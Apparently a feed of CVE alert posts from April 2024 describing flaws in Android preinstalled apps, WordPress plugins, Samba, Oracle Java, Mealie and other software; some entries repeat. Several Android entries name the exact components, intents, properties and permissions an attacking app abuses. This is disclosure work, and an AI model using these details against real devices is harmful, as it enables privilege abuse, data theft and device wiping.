🚨 CVE-2023-38294Certain software builds for the Itel Vision 3 Turbo Android device contain a vulnerable pre-installed app with a package name of com.transsion.autotest.factory (versionCode='7', versionName='1.8.0(220310_1027)') that allows local third-party apps to execute arbitrary shell commands in its context (system user) due to inadequate access control. No permissions or special privileges are necessary to exploit the vulnerability in the com.transsion.autotest.factory app. No user interaction is required beyond installing and running a third-party app. The vulnerability allows local apps to access sensitive functionality that is generally restricted to pre-installed apps, such as programmatically performing the following actions: granting arbitrary permissions (which can be used to obtain sensitive user data), installing arbitrary apps, video recording the screen, wiping the device (removing the user's apps and data), injecting arbitrary input events, calling emergency phone numbers, disabling apps, accessing notifications, and much more. The confirmed vulnerable software build fingerprints for the Itel Vision 3 Turbo device are as follows: Itel/F6321/itel-S661LP:11/RP1A.201005.001/GL-V92-20230105:user/release-keys, Itel/F6321/itel-S661LP:11/RP1A.201005.001/GL-V86-20221118:user/release-keys, Itel/F6321/itel-S661LP:11/RP1A.201005.001/GL-V78-20221101:user/release-keys, Itel/F6321/itel-S661LP:11/RP1A.201005.001/GL-V64-20220803:user/release-keys, Itel/F6321/itel-S661LP:11/RP1A.201005.001/GL-V61-20220721:user/release-keys, Itel/F6321/itel-S661LP:11/RP1A.201005.001/GL-V58-20220712:user/release-keys, and Itel/F6321/itel-S661LP:11/RP1A.201005.001/GL-V051-20220613:user/release-keys. This malicious app sends a broadcast Intent to the receiver component named com.transsion.autotest.factory/.broadcast.CommandReceiver with the path to a shell script that it creates in its scoped storage directory. Then the com.transsion.autotest.factory app will execute the shell script with "system" privileges.🎖@cveNotify |
|
| 2024-04-22 19:37:37 |
🚨 CVE-2023-38292Certain software builds for the TCL 20XE Android device contain a vulnerable, pre-installed app with a package name of com.tct.gcs.hiddenmenuproxy (versionCode='2', versionName='v11.0.1.0.0201.0') that allows local third-party apps to programmatically perform a factory reset due to inadequate access control. No permissions or special privileges are necessary to exploit the vulnerability in the com.tct.gcs.hiddenmenuproxy app. No user interaction is required beyond installing and running a third-party app. The software build fingerprints for each confirmed vulnerable build are as follows: TCL/5087Z_BO/Doha_TMO:11/RP1A.200720.011/PB7I-0:user/release-keys and TCL/5087Z_BO/Doha_TMO:11/RP1A.200720.011/PB83-0:user/release-keys. This malicious app sends a broadcast intent to the exported com.tct.gcs.hiddenmenuproxy/.rtn.FactoryResetReceiver receiver component, which initiates a programmatic factory reset.🎖@cveNotify |
|
| 2024-04-22 19:37:36 |
🚨 CVE-2023-38291An issue was discovered in a third-party component related to ro.boot.wifimacaddr, shipped on devices from multiple device manufacturers. Various software builds for the following TCL devices (30Z and 10L) and Motorola devices (Moto G Pure and Moto G Power) leak the Wi-Fi MAC address to a system property that can be accessed by any local app on the device without any permissions or special privileges. Google restricted third-party apps from directly obtaining non-resettable device identifiers in Android 10 and higher, but in these instances they are leaked by a high-privilege process and can be obtained indirectly. The software build fingerprints for each confirmed vulnerable device are as follows: TCL A3X (TCL/A600DL/Delhi_TF:11/RKQ1.201202.002/vAAZ:user/release-keys, TCL/A600DL/Delhi_TF:11/RKQ1.201202.002/vAB3:user/release-keys, TCL/A600DL/Delhi_TF:11/RKQ1.201202.002/vAB7:user/release-keys, TCL/A600DL/Delhi_TF:11/RKQ1.201202.002/vABA:user/release-keys, TCL/A600DL/Delhi_TF:11/RKQ1.201202.002/vABM:user/release-keys, TCL/A600DL/Delhi_TF:11/RKQ1.201202.002/vABP:user/release-keys, and TCL/A600DL/Delhi_TF:11/RKQ1.201202.002/vABS:user/release-keys); TCL 10L (TCL/T770B/T1_LITE:10/QKQ1.200329.002/3CJ0:user/release-keys and TCL/T770B/T1_LITE:11/RKQ1.210107.001/8BIC:user/release-keys); Motorola Moto G Pure (motorola/ellis_trac/ellis:11/RRHS31.Q3-46-110-2/74844:user/release-keys, motorola/ellis_trac/ellis:11/RRHS31.Q3-46-110-7/5cde8:user/release-keys, motorola/ellis_trac/ellis:11/RRHS31.Q3-46-110-10/d67faa:user/release-keys, motorola/ellis_trac/ellis:11/RRHS31.Q3-46-110-13/b4a29:user/release-keys, motorola/ellis_trac/ellis:12/S3RH32.20-42-10/1c2540:user/release-keys, motorola/ellis_trac/ellis:12/S3RHS32.20-42-13-2-1/6368dd:user/release-keys, motorola/ellis_a/ellis:11/RRH31.Q3-46-50-2/20fec:user/release-keys, motorola/ellis_vzw/ellis:11/RRH31.Q3-46-138/103bd:user/release-keys, motorola/ellis_vzw/ellis:11/RRHS31.Q3-46-138-2/e5502:user/release-keys, and motorola/ellis_vzw/ellis:12/S3RHS32.20-42-10-14-2/5e0b0:user/release-keys); and Motorola Moto G Power (motorola/tonga_g/tonga:11/RRQ31.Q3-68-16-2/e5877:user/release-keys and motorola/tonga_g/tonga:12/S3RQS32.20-42-10-6/f876d3:user/release-keys). This malicious app reads from the "ro.boot.wifimacaddr" system property to indirectly obtain the Wi-Fi MAC address.🎖@cveNotify |
|
| 2024-04-22 19:37:32 |
🚨 CVE-2022-35503Improper verification of a user input in Open Source MANO v7-v12 allows an authenticated attacker to execute arbitrary code within the LCM module container via a Virtual Network Function (VNF) descriptor. An attacker may be able execute code to change the normal execution of the OSM components, retrieve confidential information, or gain access other parts of a Telco Operator infrastructure other than OSM itself.🎖@cveNotify |
|
| 2024-04-22 19:37:31 |
🚨 CVE-2022-34561A cross-site scripting (XSS) vulnerability in PHPFox v4.8.9 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the video description parameter.🎖@cveNotify |
|
| 2024-04-22 19:37:30 |
🚨 CVE-2022-34560A cross-site scripting (XSS) vulnerability in PHPFox v4.8.9 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the History parameter.🎖@cveNotify |
|
| 2024-04-22 19:37:27 |
🚨 CVE-2024-3645The Essential Addons for Elementor Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Counter widget in all versions up to, and including, 5.8.11 due to insufficient input sanitization and output escaping on user supplied attributes such as 'title_html_tag'. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-04-22 19:37:26 |
🚨 CVE-2024-32368Insecure Permission vulnerability in Agasta Sanketlife 2.0 Pocket 12-Lead ECG Monitor FW Version 3.0 allows a local attacker to cause a denial of service via the Bluetooth Low Energy (BLE) component.🎖@cveNotify |
|
| 2024-04-22 19:37:25 |
🚨 CVE-2024-27347Server-Side Request Forgery (SSRF) vulnerability in Apache HugeGraph-Hubble.This issue affects Apache HugeGraph-Hubble: from 1.0.0 before 1.3.0.Users are recommended to upgrade to version 1.3.0, which fixes the issue.🎖@cveNotify |
|
| 2024-04-22 18:37:25 |
🚨 CVE-2024-31666An issue in flusity-CMS v.2.33 allows a remote attacker to execute arbitrary code via a crafted script to the edit_addon_post.php component.🎖@cveNotify |
|
| 2024-04-22 18:37:24 |
🚨 CVE-2022-46897An issue was discovered in Insyde InsydeH2O with kernel 5.0 through 5.5. The CapsuleIFWUSmm driver does not check the return value from a method or function. This can prevent it from detecting unexpected states and conditions.🎖@cveNotify |
|
| 2024-04-22 17:37:24 |
🚨 CVE-2024-28436Cross Site Scripting vulnerability in D-Link DAP products DAP-2230, DAP-2310, DAP-2330, DAP-2360, DAP-2553, DAP-2590, DAP-2690, DAP-2695, DAP-3520, DAP-3662 allows a remote attacker to execute arbitrary code via the reload parameter in the session_login.php component.🎖@cveNotify |
|
| 2024-04-22 16:37:38 |
🚨 CVE-2023-26597Controller DoS due to buffer overflow in the handling of a specially crafted message received by the controller. See Honeywell Security Notification for recommendations on upgrading and versioning. See Honeywell Security Notification for recommendations on upgrading and versioning.🎖@cveNotify |
|
| 2024-04-22 16:37:37 |
🚨 CVE-2023-25948Server information leak of configuration data when an error is generated in response to a specially crafted message. See Honeywell Security Notification for recommendations on upgrading and versioning.🎖@cveNotify |
|
| 2024-04-22 16:37:34 |
🚨 CVE-2023-25770Controller DoS may occur due to buffer overflow when an error is generated in response to a specially crafted message. See Honeywell Security Notification for recommendations on upgrading and versioning.🎖@cveNotify |
|
| 2024-04-22 16:37:33 |
🚨 CVE-2023-24480Controller DoS due to stack overflow when decoding a message from the server. See Honeywell Security Notification for recommendations on upgrading and versioning.🎖@cveNotify |
|
| 2024-04-22 16:37:32 |
🚨 CVE-2023-23585Experion server DoS due to heap overflow occurring during the handling of a specially crafted message for a specific configuration operation. See Honeywell Security Notification for recommendations on upgrading and versioning.🎖@cveNotify |
|
| 2024-04-22 16:37:29 |
🚨 CVE-2022-3437A heap-based buffer overflow vulnerability was found in Samba within the GSSAPI unwrap_des() and unwrap_des3() routines of Heimdal. The DES and Triple-DES decryption routines in the Heimdal GSSAPI library allow a length-limited write buffer overflow on malloc() allocated memory when presented with a maliciously small packet. This flaw allows a remote user to send specially crafted malicious data to the application, possibly resulting in a denial of service (DoS) attack.🎖@cveNotify |
|
| 2024-04-22 16:37:28 |
🚨 CVE-2020-14318A flaw was found in the way samba handled file and directory permissions. An authenticated user could use this flaw to gain access to certain file and directory information which otherwise would be unavailable to the attacker.🎖@cveNotify |
|
| 2024-04-22 16:37:27 |
🚨 CVE-2020-14323A null pointer dereference flaw was found in samba's Winbind service in versions before 4.11.15, before 4.12.9 and before 4.13.1. A local user could use this flaw to crash the winbind service causing denial of service.🎖@cveNotify |
|
| 2024-04-22 15:37:44 |
🚨 CVE-2023-38298Various software builds for the following TCL devices (30Z, A3X, 20XE, 10L) leak the device IMEI to a system property that can be accessed by any local app on the device without any permissions or special privileges. Google restricted third-party apps from directly obtaining non-resettable device identifiers in Android 10 and higher, but in these instances they are leaked by a high-privilege process and can be obtained indirectly. The software build fingerprints for each confirmed vulnerable device are as follows: TCL 30Z (TCL/4188R/Jetta_ATT:12/SP1A.210812.016/LV8E:user/release-keys, TCL/T602DL/Jetta_TF:12/SP1A.210812.016/vU5P:user/release-keys, TCL/T602DL/Jetta_TF:12/SP1A.210812.016/vU61:user/release-keys, TCL/T602DL/Jetta_TF:12/SP1A.210812.016/vU66:user/release-keys, TCL/T602DL/Jetta_TF:12/SP1A.210812.016/vU68:user/release-keys, TCL/T602DL/Jetta_TF:12/SP1A.210812.016/vU6P:user/release-keys, and TCL/T602DL/Jetta_TF:12/SP1A.210812.016/vU6X:user/release-keys); TCL A3X (TCL/A600DL/Delhi_TF:11/RKQ1.201202.002/vAAZ:user/release-keys, TCL/A600DL/Delhi_TF:11/RKQ1.201202.002/vAB3:user/release-keys, TCL/A600DL/Delhi_TF:11/RKQ1.201202.002/vAB7:user/release-keys, TCL/A600DL/Delhi_TF:11/RKQ1.201202.002/vABA:user/release-keys, TCL/A600DL/Delhi_TF:11/RKQ1.201202.002/vABM:user/release-keys, TCL/A600DL/Delhi_TF:11/RKQ1.201202.002/vABP:user/release-keys, and TCL/A600DL/Delhi_TF:11/RKQ1.201202.002/vABS:user/release-keys); TCL 20XE (TCL/5087Z_BO/Doha_TMO:11/RP1A.200720.011/PB7I-0:user/release-keys and TCL/5087Z_BO/Doha_TMO:11/RP1A.200720.011/PB83-0:user/release-keys); and TCL 10L (TCL/T770B/T1_LITE:10/QKQ1.200329.002/3CJ0:user/release-keys and TCL/T770B/T1_LITE:11/RKQ1.210107.001/8BIC:user/release-keys). This malicious app reads from the "gsm.device.imei0" system property to indirectly obtain the device IMEI.🎖@cveNotify |
|
| 2024-04-22 15:37:43 |
🚨 CVE-2023-38296Various software builds for the following TCL 30Z and TCL A3X devices leak the ICCID to a system property that can be accessed by any local app on the device without any permissions or special privileges. Google restricted third-party apps from directly obtaining non-resettable device identifiers in Android 10 and higher, but in these instances they are leaked by a high-privilege process and can be obtained indirectly. The software build fingerprints for each confirmed vulnerable device are as follows: TCL 30Z (TCL/4188R/Jetta_ATT:12/SP1A.210812.016/LV8E:user/release-keys, TCL/T602DL/Jetta_TF:12/SP1A.210812.016/vU5P:user/release-keys, TCL/T602DL/Jetta_TF:12/SP1A.210812.016/vU61:user/release-keys, TCL/T602DL/Jetta_TF:12/SP1A.210812.016/vU66:user/release-keys, TCL/T602DL/Jetta_TF:12/SP1A.210812.016/vU68:user/release-keys, TCL/T602DL/Jetta_TF:12/SP1A.210812.016/vU6P:user/release-keys, and TCL/T602DL/Jetta_TF:12/SP1A.210812.016/vU6X:user/release-keys) and TCL A3X (TCL/A600DL/Delhi_TF:11/RKQ1.201202.002/vAAZ:user/release-keys, TCL/A600DL/Delhi_TF:11/RKQ1.201202.002/vAB3:user/release-keys, TCL/A600DL/Delhi_TF:11/RKQ1.201202.002/vAB7:user/release-keys, TCL/A600DL/Delhi_TF:11/RKQ1.201202.002/vABA:user/release-keys, TCL/A600DL/Delhi_TF:11/RKQ1.201202.002/vABM:user/release-keys, TCL/A600DL/Delhi_TF:11/RKQ1.201202.002/vABP:user/release-keys, and TCL/A600DL/Delhi_TF:11/RKQ1.201202.002/vABS:user/release-keys). This malicious app reads from the "persist.sys.tctPowerIccid" system property to indirectly obtain the ICCID.🎖@cveNotify |
|
| 2024-04-22 15:37:42 |
🚨 CVE-2023-38295Certain software builds for the TCL 30Z and TCL 10 Android devices contain a vulnerable, pre-installed app that relies on a missing permission that provides no protection at runtime. The missing permission is required as an access permission by components in various pre-installed apps. On the TCL 30Z device, the vulnerable app has a package name of com.tcl.screenrecorder (versionCode='1221092802', versionName='v5.2120.02.12008.1.T' ; versionCode='1221092805', versionName='v5.2120.02.12008.2.T'). On the TCL 10L device, the vulnerable app has a package name of com.tcl.sos (versionCode='2020102827', versionName='v3.2014.12.1012.B'). When a third-party app declares and requests the missing permission, it can interact with certain service components in the aforementioned apps (that execute with "system" privileges) to perform arbitrary files reads/writes in its context. An app exploiting this vulnerability only needs to declare and request the single missing permission and no user interaction is required beyond installing and running a third-party app. The software build fingerprints for each confirmed vulnerable device are as follows: TCL 10L (TCL/T770B/T1_LITE:11/RKQ1.210107.001/8BIC:user/release-keys) and TCL 30Z (TCL/4188R/Jetta_ATT:12/SP1A.210812.016/LV8E:user/release-keys, TCL/T602DL/Jetta_TF:12/SP1A.210812.016/vU5P:user/release-keys, TCL/T602DL/Jetta_TF:12/SP1A.210812.016/vU61:user/release-keys, TCL/T602DL/Jetta_TF:12/SP1A.210812.016/vU66:user/release-keys, TCL/T602DL/Jetta_TF:12/SP1A.210812.016/vU68:user/release-keys, TCL/T602DL/Jetta_TF:12/SP1A.210812.016/vU6P:user/release-keys, and TCL/T602DL/Jetta_TF:12/SP1A.210812.016/vU6X:user/release-keys). This malicious app declares the missing permission named com.tct.smart.switchphone.permission.SWITCH_DATA as a normal permission, requests the missing permission, and uses it to interact with the com.tct.smart.switchdata.DataService service component that is declared in vulnerable apps that execute with "system" privileges to perform arbitrary file reads/writes.🎖@cveNotify |
|
| 2024-04-22 15:37:38 |
🚨 CVE-2023-38293Certain software builds for the Nokia C200 and Nokia C100 Android devices contain a vulnerable, pre-installed app with a package name of com.tracfone.tfstatus (versionCode='31', versionName='12') that allows local third-party apps to execute arbitrary AT commands in its context (radio user) via AT command injection due to inadequate access control and inadequate input filtering. No permissions or special privileges are necessary to exploit the vulnerability in the com.tracfone.tfstatus app. No user interaction is required beyond installing and running a third-party app. The software build fingerprints for each confirmed vulnerable device are as follows: Nokia C200 (Nokia/Drake_02US/DRK:12/SP1A.210812.016/02US_1_080:user/release-keys and Nokia/Drake_02US/DRK:12/SP1A.210812.016/02US_1_040:user/release-keys) and Nokia C100 (Nokia/DrakeLite_02US/DKT:12/SP1A.210812.016/02US_1_270:user/release-keys, Nokia/DrakeLite_02US/DKT:12/SP1A.210812.016/02US_1_190:user/release-keys, Nokia/DrakeLite_02US/DKT:12/SP1A.210812.016/02US_1_130:user/release-keys, Nokia/DrakeLite_02US/DKT:12/SP1A.210812.016/02US_1_110:user/release-keys, Nokia/DrakeLite_02US/DKT:12/SP1A.210812.016/02US_1_080:user/release-keys, and Nokia/DrakeLite_02US/DKT:12/SP1A.210812.016/02US_1_050:user/release-keys). This malicious app sends a broadcast Intent to the receiver component named com.tracfone.tfstatus/.TFStatus. This broadcast receiver extracts a string from the Intent and uses it as an extra when it starts the com.tracfone.tfstatus/.TFStatusActivity activity component which uses the externally controlled string as an input to execute an AT command. There are two different injection techniques to successfully inject arbitrary AT commands to execute.🎖@cveNotify |
|
| 2024-04-22 15:37:37 |
🚨 CVE-2023-38291An issue was discovered in a third-party component related to ro.boot.wifimacaddr, shipped on devices from multiple device manufacturers. Various software builds for the following TCL devices (30Z and 10L) and Motorola devices (Moto G Pure and Moto G Power) leak the Wi-Fi MAC address to a system property that can be accessed by any local app on the device without any permissions or special privileges. Google restricted third-party apps from directly obtaining non-resettable device identifiers in Android 10 and higher, but in these instances they are leaked by a high-privilege process and can be obtained indirectly. The software build fingerprints for each confirmed vulnerable device are as follows: TCL A3X (TCL/A600DL/Delhi_TF:11/RKQ1.201202.002/vAAZ:user/release-keys, TCL/A600DL/Delhi_TF:11/RKQ1.201202.002/vAB3:user/release-keys, TCL/A600DL/Delhi_TF:11/RKQ1.201202.002/vAB7:user/release-keys, TCL/A600DL/Delhi_TF:11/RKQ1.201202.002/vABA:user/release-keys, TCL/A600DL/Delhi_TF:11/RKQ1.201202.002/vABM:user/release-keys, TCL/A600DL/Delhi_TF:11/RKQ1.201202.002/vABP:user/release-keys, and TCL/A600DL/Delhi_TF:11/RKQ1.201202.002/vABS:user/release-keys); TCL 10L (TCL/T770B/T1_LITE:10/QKQ1.200329.002/3CJ0:user/release-keys and TCL/T770B/T1_LITE:11/RKQ1.210107.001/8BIC:user/release-keys); Motorola Moto G Pure (motorola/ellis_trac/ellis:11/RRHS31.Q3-46-110-2/74844:user/release-keys, motorola/ellis_trac/ellis:11/RRHS31.Q3-46-110-7/5cde8:user/release-keys, motorola/ellis_trac/ellis:11/RRHS31.Q3-46-110-10/d67faa:user/release-keys, motorola/ellis_trac/ellis:11/RRHS31.Q3-46-110-13/b4a29:user/release-keys, motorola/ellis_trac/ellis:12/S3RH32.20-42-10/1c2540:user/release-keys, motorola/ellis_trac/ellis:12/S3RHS32.20-42-13-2-1/6368dd:user/release-keys, motorola/ellis_a/ellis:11/RRH31.Q3-46-50-2/20fec:user/release-keys, motorola/ellis_vzw/ellis:11/RRH31.Q3-46-138/103bd:user/release-keys, motorola/ellis_vzw/ellis:11/RRHS31.Q3-46-138-2/e5502:user/release-keys, and motorola/ellis_vzw/ellis:12/S3RHS32.20-42-10-14-2/5e0b0:user/release-keys); and Motorola Moto G Power (motorola/tonga_g/tonga:11/RRQ31.Q3-68-16-2/e5877:user/release-keys and motorola/tonga_g/tonga:12/S3RQS32.20-42-10-6/f876d3:user/release-keys). This malicious app reads from the "ro.boot.wifimacaddr" system property to indirectly obtain the Wi-Fi MAC address.🎖@cveNotify |
|
| 2024-04-22 15:37:36 |
🚨 CVE-2023-38290Certain software builds for the BLU View 2 and Sharp Rouvo V Android devices contain a vulnerable pre-installed app with a package name of com.evenwell.fqc (versionCode='9020801', versionName='9.0208.01' ; versionCode='9020913', versionName='9.0209.13' ; versionCode='9021203', versionName='9.0212.03') that allows local third-party apps to execute arbitrary shell commands in its context (system user) due to inadequate access control. No permissions or special privileges are necessary to exploit the vulnerability in the com.evenwell.fqc app. No user interaction is required beyond installing and running a third-party app. The vulnerability allows local apps to access sensitive functionality that is generally restricted to pre-installed apps, such as programmatically performing the following actions: granting arbitrary permissions (which can be used to obtain sensitive user data), installing arbitrary apps, video recording the screen, wiping the device (removing the user's apps and data), injecting arbitrary input events, calling emergency phone numbers, disabling apps, accessing notifications, and much more. The software build fingerprints for each confirmed vulnerable device are as follows: BLU View 2 (BLU/B131DL/B130DL:11/RP1A.200720.011/1672046950:user/release-keys, BLU/B131DL/B130DL:11/RP1A.200720.011/1663816427:user/release-keys, BLU/B131DL/B130DL:11/RP1A.200720.011/1656476696:user/release-keys, BLU/B131DL/B130DL:11/RP1A.200720.011/1647856638:user/release-keys) and Sharp Rouvo V (SHARP/VZW_STTM21VAPP/STTM21VAPP:12/SP1A.210812.016/1KN0_0_460:user/release-keys and SHARP/VZW_STTM21VAPP/STTM21VAPP:12/SP1A.210812.016/1KN0_0_530:user/release-keys). This malicious app starts an exported activity named com.evenwell.fqc/.activity.ClickTest, crashes the com.evenwell.fqc app by sending an empty Intent (i.e., having not extras) to the com.evenwell.fqc/.FQCBroadcastReceiver receiver component, and then it sends command arbitrary shell commands to the com.evenwell.fqc/.FQCService service component which executes them with "system" privileges.🎖@cveNotify |
|
| 2024-04-22 15:37:32 |
🚨 CVE-2022-34562A cross-site scripting (XSS) vulnerability in PHPFox v4.8.9 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the status box.🎖@cveNotify |
|
| 2024-04-22 15:37:31 |
🚨 CVE-2022-34560A cross-site scripting (XSS) vulnerability in PHPFox v4.8.9 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the History parameter.🎖@cveNotify |
|
| 2024-04-22 15:37:30 |
🚨 CVE-2024-4021A vulnerability was found in Keenetic KN-1010, KN-1410, KN-1711, KN-1810 and KN-1910 up to 4.1.2.15. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /ndmComponents.js of the component Configuration Setting Handler. The manipulation leads to information disclosure. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-261673 was assigned to this vulnerability. NOTE: The vendor is aware of this issue and plans to fix it by the end of 2024.🎖@cveNotify |
|
| 2024-04-22 15:37:26 |
🚨 CVE-2024-21068Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 8u401-perf, 11.0.22, 17.0.10, 21.0.2, 22; Oracle GraalVM for JDK: 17.0.10, 21.0.2 and 22; Oracle GraalVM Enterprise Edition: 21.3.9. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).🎖@cveNotify |
|
| 2024-04-22 15:37:25 |
🚨 CVE-2024-21012Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Networking). Supported versions that are affected are Oracle Java SE: 11.0.22, 17.0.10, 21.0.2, 22; Oracle GraalVM for JDK: 17.0.10, 21.0.2, 22; Oracle GraalVM Enterprise Edition: 20.3.13 and 21.3.9. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).🎖@cveNotify |
|
| 2024-04-22 15:37:24 |
🚨 CVE-2024-21011Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 8u401, 8u401-perf, 11.0.22, 17.0.10, 21.0.2, 22; Oracle GraalVM for JDK: 17.0.10, 21.0.2, 22; Oracle GraalVM Enterprise Edition: 20.3.13 and 21.3.9. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).🎖@cveNotify |
|
| 2024-04-22 14:37:26 |
🚨 CVE-2024-32368Insecure Permission vulnerability in Agasta Sanketlife 2.0 Pocket 12-Lead ECG Monitor FW Version 3.0 allows a local attacker to cause a denial of service via the Bluetooth Low Energy (BLE) component.🎖@cveNotify |
|
| 2024-04-22 14:37:25 |
🚨 CVE-2024-27348RCE-Remote Command Execution vulnerability in Apache HugeGraph-Server.This issue affects Apache HugeGraph-Server: from 1.0.0 before 1.3.0 in Java8 & Java11Users are recommended to upgrade to version 1.3.0 with Java11 & enable the Auth system, which fixes the issue.🎖@cveNotify |
|
| 2024-04-22 14:37:24 |
🚨 CVE-2024-27347Server-Side Request Forgery (SSRF) vulnerability in Apache HugeGraph-Hubble.This issue affects Apache HugeGraph-Hubble: from 1.0.0 before 1.3.0.Users are recommended to upgrade to version 1.3.0, which fixes the issue.🎖@cveNotify |
|
| 2024-04-22 13:37:45 |
🚨 CVE-2024-4020A vulnerability was found in Tenda FH1206 1.2.0.8(8155) and classified as critical. This issue affects the function fromAddressNat of the file /goform/addressNat. The manipulation of the argument entrys leads to buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-261671. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-22 13:37:44 |
🚨 CVE-2024-4014The hCaptcha for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's cf7-hcaptcha shortcode in all versions up to, and including, 4.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-04-22 13:37:43 |
🚨 CVE-2024-1057The ShopLentor – WooCommerce Builder for Elementor & Gutenberg +10 Modules – All in One Solution (formerly WooLentor) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wishsuite_button' shortcode in all versions up to, and including, 2.8.1 due to insufficient input sanitization and output escaping on user supplied attributes like 'button_class'. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-04-22 13:37:39 |
🚨 CVE-2024-31994Mealie is a self hosted recipe manager and meal planner. Prior to 1.4.0, an attacker can point the image request to an arbitrarily large file. Mealie will attempt to retrieve this file in whole. If it can be retrieved, it may be stored on the file system in whole (leading to possible disk consumption), however the more likely scenario given resource limitations is that the container will OOM during file retrieval if the target file size is greater than the allocated memory of the container. At best this can be used to force the container to infinitely restart due to OOM (if so configured in `docker-compose.yml), or at worst this can be used to force the Mealie container to crash and remain offline. In the event that the file can be retrieved, the lack of rate limiting on this endpoint also permits an attacker to generate ongoing requests to any target of their choice, potentially contributing to an external-facing DoS attack. This vulnerability is fixed in 1.4.0.🎖@cveNotify |
|
| 2024-04-22 13:37:38 |
🚨 CVE-2024-4018Improper Privilege Management vulnerability in BeyondTrust U-Series Appliance on Windows, 64 bit (local appliance api modules) allows Privilege Escalation.This issue affects U-Series Appliance: from 3.4 before 4.0.3.🎖@cveNotify |
|
| 2024-04-22 13:37:37 |
🚨 CVE-2024-32392Cross Site Scripting vulnerability in CmSimple v.5.15 allows a remote attacker to execute arbitrary code via the functions.php component.🎖@cveNotify |
|
| 2024-04-22 13:37:33 |
🚨 CVE-2024-32391Cross Site Scripting vulnerability in MacCMS v.10 v.2024.1000.3000 allows a remote attacker to execute arbitrary code via a crafted payload.🎖@cveNotify |
|
| 2024-04-22 13:37:32 |
🚨 CVE-2024-31993Mealie is a self hosted recipe manager and meal planner. Prior to 1.4.0, the scrape_image function will retrieve an image based on a user-provided URL, however the provided URL is not validated to point to an external location and does not have any enforced rate limiting. The response from the Mealie server will also vary depending on whether or not the target file is an image, is not an image, or does not exist. Additionally, when a file is retrieved the file may remain stored on Mealie’s file system as original.jpg under the UUID of the recipe it was requested for. If the attacker has access to an admin account (e.g. the default changeme@example.com), this file can then be retrieved. Note that if Mealie is running in a development setting this could be leveraged by an attacker to retrieve any file that the Mealie server had downloaded in this fashion without the need for administrator access. This vulnerability is fixed in 1.4.0.🎖@cveNotify |
|
| 2024-04-22 13:37:31 |
🚨 CVE-2024-31991Mealie is a self hosted recipe manager and meal planner. Prior to 1.4.0, the safe_scrape_html function utilizes a user-controlled URL to issue a request to a remote server. Based on the content of the response, it will either parse the content or disregard it. This function, nor those that call it, add any restrictions on the URL that can be provided, nor is it restricted to being an FQDN (i.e., an IP address can be provided). As this function’s return will be handled differently by its caller depending on the response, it is possible for an attacker to use this functionality to positively identify HTTP(s) servers on the local network with any IP/port combination. This issue can result in any authenticated user being able to map HTTP servers on a local network that the Mealie service has access to. Note that by default any user can create an account on a Mealie server, and that the default changeme@example.com user is available with its hard-coded password. This vulnerability is fixed in 1.4.0.🎖@cveNotify |
|
